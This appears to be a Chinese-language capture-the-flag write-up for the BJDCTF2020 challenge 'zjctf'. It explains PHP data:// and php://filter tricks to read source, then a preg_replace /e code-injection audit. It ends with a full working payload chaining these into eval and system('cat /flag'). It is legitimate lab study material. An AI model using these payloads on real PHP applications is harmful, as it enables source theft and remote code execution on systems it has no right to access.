[bjdctf2020]zjctf，不过如此

题目

php伪协议 

file_get_contents函数读取文件内容，内容"I have a dream"，可以利用data伪协议，接着通过注释使file=next.php

 可用php伪协议读取源码file=php://filter/convert.base64-encode/resource=next.php

 base64解码得到

 $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

代码审计

preg_replace函数中，用strtolower("\\1")替换正则表达式匹配到的字符串，正则表达式跟$re有关，而$re又是通过GET方法传的参数名称，所以可控，要匹配的$str则是参数值，所以也可控，“\\1”其实就是\1，意思是第一个子匹配项，使用/e修饰符，preg_replace会将 replacement 参数当作 PHP 代码执行。

慎用preg_replace危险的/e修饰符(一句话后门常用) - 稻禾盛夏 - 博客园 (cnblogs.com)

例如:?.*=${phpinfo()}，所以

 preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str)变成了

preg_replace('/(.*)/ei','strtolower("\\1")',${phpinfo()})

但会发现'.'变成了下划线，在本地试了一下，发现用'\S*'可行，至于为什么'.'变成下划线，可参考

PHP: 来自 PHP 之外的变量 - Manual

  

至于为什么写成${phpinfo()}形式，是因为/e模式下会执行'strtolower("\\1")'，而\1匹配到${phpinfo()}，所以执行strtolower("${phpinfo()}")，而在php中双引号里的变量会被解析(可参考PHP: 可变变量 - Manual)，单引号不会，因此phpinfo()会执行并返回true，也就是"1"，最终变成了${1}，echo输出空字符串

payload

?text=data://text/plain,I have a dream&file=next.php&\S*=${getflag()}&cmd=system('cat /flag');

得到flag